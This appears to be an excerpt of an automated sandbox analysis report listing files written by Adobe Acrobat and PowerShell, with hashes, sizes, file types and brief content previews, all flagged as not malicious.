                                                                                SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                Malicious:false
                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:PostScript document text
                                                                                Category:dropped
                                                                                Size (bytes):10880
                                                                                Entropy (8bit):5.214360287289079
                                                                                Encrypted:false
                                                                                SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                Malicious:false
                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):4
                                                                                Entropy (8bit):0.8112781244591328
                                                                                Encrypted:false
                                                                                SSDEEP:3:e:e
                                                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                Malicious:false
                                                                                Preview:....
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):1969
                                                                                Entropy (8bit):5.050217820049872
                                                                                Encrypted:false
                                                                                SSDEEP:24:YFu63QJGv7aZna0TNpnayGZmmuBJvbZW4xCZqu20Z+nZO8ZMCCDxiZ8vGwacOG:YBAwOtoitbRCwu20wD+JliWxao
                                                                                MD5:FB959DDE5048EA0471733E5DBA4BA726
                                                                                SHA1:987D2CD3C36D15D2EFCF50226821CE1F827CCAA2
                                                                                SHA-256:85B36D576213B799AABB8DABD3FEC99A64ED59A00DADE0480D376050E2657BEE
                                                                                SHA-512:AEC363AB48A8688FDB82ADCF164A69BE33FD28B72EF07C3CDBEB38D286057B58C38A24B5EC8321EDA5B4B466212ECB78A11C69926C0203176D2D51E56AC00A2D
                                                                                Malicious:false
                                                                                Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1736845426000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d550de899f04b5f1cb01c3a7438d5d96","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696428962000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"cfa45c7829b86b94abc8cd788add6752","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696428962000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"3ef850c86adcfefa30feaf6c5c1404b1","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1696426848000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"955b63af1bb125ce44faeb9a35adb91d","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696426848000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"2fa014516e78a80092801abd5694c0be","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696426848000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"78ee
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                Category:dropped
                                                                                Size (bytes):12288
                                                                                Entropy (8bit):0.9861621276488322
                                                                                Encrypted:false
                                                                                SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpsO4zJwtNBwtNbRZ6bRZ4/OF:TVl2GL7ms6ggOVpYzutYtp6Pv
                                                                                MD5:C6F5075FB3EE4D487A3FE8802581D55B
                                                                                SHA1:99F793242AB2D98E9409DF5FB5BA9FFDBD6501F6
                                                                                SHA-256:4BEA7DE3A061DC2212694D72BCA85190E6D7E1E706EFA9713F3F5A15BF712364
                                                                                SHA-512:CA46DE703D53FC45879AE1A9EEA7384C12041723EC05603D50F6CC96F7B43FC888339B13F529F23135EE2B83C2AA932CD08BAD324769C7D0D423D6324728C7E6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:SQLite Rollback Journal
                                                                                Category:dropped
                                                                                Size (bytes):8720
                                                                                Entropy (8bit):1.3401884624320257
                                                                                Encrypted:false
                                                                                SSDEEP:24:7+tbAD1RZKHs/Ds/SpsOPzJwtNBwtNbRZ6bRZWf1RZKflfqLBx/XYKQvGJF7ursj:7MbGgOVpvzutYtp6PMIqll2GL7msj
                                                                                MD5:BB79CF9B2D3CE70012B9C1B9037F1449
                                                                                SHA1:932C5BC3AEF01A38F2FE01D6CAD606DBA82EA6D9
                                                                                SHA-256:B1D33A941C1B7191EDDB79A68C842060C9B777FC60A12B17C4EC78B1721D11ED
                                                                                SHA-512:65AD279C165513F9E08BE473DC4F33C7E56973D6F43C15C1410FA0A64D025ED2C5C1B5B685E31304E1B150531CF7DA9F762050BEBB6185871FED650CE68B0021
                                                                                Malicious:false
                                                                                Preview:.... .c.....8........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):66726
                                                                                Entropy (8bit):5.392739213842091
                                                                                Encrypted:false
                                                                                SSDEEP:768:RNOpblrU6TBH44ADKZEg43G30vDHxCI6ezf4cyIClV2QYyu:6a6TZ44ADE43GkvDHxcFHdK
                                                                                MD5:3CDCE2A543176B679B0C2B579076E3A0
                                                                                SHA1:4678D0577BBC89381B62BA9BE23ADF17524F0F72
                                                                                SHA-256:AC52D22E53C12D72C94841898D9B8E0B65CFC954E2827DE083C3285EE84455C8
                                                                                SHA-512:C6A704AA4AAC36253ED543189EF7F59C9602B46E857462CBC07B82B4A4F22AC01977C3C10717D3D210D229E8C06A615F0DBF1B324050A02EE7B656324B4FF2DC
                                                                                Malicious:false
                                                                                Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):11608
                                                                                Entropy (8bit):4.890472898059848
                                                                                Encrypted:false
                                                                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdR2Ca6pZlbjvwRjdHPRhAgkjDt4iWN3yBGHVQ9sQ:9rib4ZoopbjvwRjdvRNkjh4iUxsT6YpR
                                                                                MD5:6F4062C990C67D040ABC7B0F73689E66
                                                                                SHA1:93421F047B440E9F62456C3E2EC1E6C842DA6A80
                                                                                SHA-256:978EF65DE3DD792E7982FAAC8AC3C878936C94E2BCE7E17C56C604E5C68745F2
                                                                                SHA-512:729AB7D57FB7D3405110D7F3C33F15057FE7DFB6DBDFFD5BD1D9F13C12C6448A70D0C39BC646F74B6A38E1708318CD4AE3D9DB1EF148815E80C30EB0122EEA57
                                                                                Malicious:false
                                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):246
                                                                                Entropy (8bit):3.5162684137903053
                                                                                Encrypted:false
                                                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84sCl4DH:Qw946cPbiOxDlbYnuRKI97
                                                                                MD5:99234326B29C7E9EB650644817C14D96
                                                                                SHA1:EF73BE7D1A1D103B20D146C6F0C732BC7EAAAAD0
                                                                                SHA-256:8CD8FB82E5848D4917BFE01E2C792A614DF539E7A4A3F5CA9020F16C8B417095
                                                                                SHA-512:1B3846EC9807B336F48E0FEBFF248F92C8F0BB9BFEAFDD43C3F12929A44AC980134CC04F4AFE5DC0FE9EEE38FAD0F0403B593D42D3BB53220A642F2532402156
                                                                                Malicious:false
                                                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.4./.0.1./.2.0.2.5. . .0.4.:.0.3.:.5.1. .=.=.=.....
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:ASCII text, with very long lines (393)
                                                                                Category:dropped
                                                                                Size (bytes):16525
                                                                                Entropy (8bit):5.376360055978702
                                                                                Encrypted:false
                                                                                SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                MD5:1336667A75083BF81E2632FABAA88B67
                                                                                SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                Malicious:false
                                                                                Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):15114
                                                                                Entropy (8bit):5.370552159307773
                                                                                Encrypted:false
                                                                                SSDEEP:384:RqGH2GjYqo/XWoFhzjEqczq65iwP2SyFxiV/xJP/O+QBvOExByzS/E/GXqELXw43:4nh
                                                                                MD5:99F4E1CA04F6D9F9291FE2EC7F1BA13A
                                                                                SHA1:F2F076D8FBEBFE5A585EA342547409B890FB6E6A
                                                                                SHA-256:2F63289626012882856AE47BB095A6E2FB345C74A599147350C5B594F403B8C7
                                                                                SHA-512:056B8412E3D73F0CDB8B32A132151959B68D1168512BBC7E0BD93843A8B51C1D17DA9E38071B919D397EB0A46132ABBECAF0A44AC3B788BE1F443CD189D3D425
                                                                                Malicious:false
                                                                                Preview:SessionID=3fb27aca-123d-443c-81d2-07995cf4219f.1736845425484 Timestamp=2025-01-14T04:03:45:484-0500 ThreadID=6508 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=3fb27aca-123d-443c-81d2-07995cf4219f.1736845425484 Timestamp=2025-01-14T04:03:45:485-0500 ThreadID=6508 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=3fb27aca-123d-443c-81d2-07995cf4219f.1736845425484 Timestamp=2025-01-14T04:03:45:485-0500 ThreadID=6508 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=3fb27aca-123d-443c-81d2-07995cf4219f.1736845425484 Timestamp=2025-01-14T04:03:45:485-0500 ThreadID=6508 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=3fb27aca-123d-443c-81d2-07995cf4219f.1736845425484 Timestamp=2025-01-14T04:03:45:485-0500 ThreadID=6508 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):29752
                                                                                Entropy (8bit):5.393330645865507
                                                                                Encrypted:false
                                                                                SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbA:0
                                                                                MD5:EA41D10DC5984D69CF8EF36E75673F2C
                                                                                SHA1:B30BD847701A42CCF53B8C3DC807D1475B0DA68A
                                                                                SHA-256:8990B37C96BDE10F0DCC0F50AAEF0B293918CDD8E3619D6AC165705B4078EA71
                                                                                SHA-512:884589BCA4AA23300BF54F847CFB69271192E0BBAA678369E64F48C9083A0AD9621AC1DBFB161706822BC3848EA1307DED07F1EB63BC41B4F9146D053385DCC5
                                                                                Malicious:false
                                                                                Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                Category:dropped
                                                                                Size (bytes):386528
                                                                                Entropy (8bit):7.9736851559892425
                                                                                Encrypted:false
                                                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                Malicious:false
                                                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                Category:dropped
                                                                                Size (bytes):758601
                                                                                Entropy (8bit):7.98639316555857
                                                                                Encrypted:false
                                                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                MD5:3A49135134665364308390AC398006F1
                                                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                Malicious:false
                                                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                Category:dropped
                                                                                Size (bytes):1407294
                                                                                Entropy (8bit):7.97605879016224
                                                                                Encrypted:false
                                                                                SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                Malicious:false
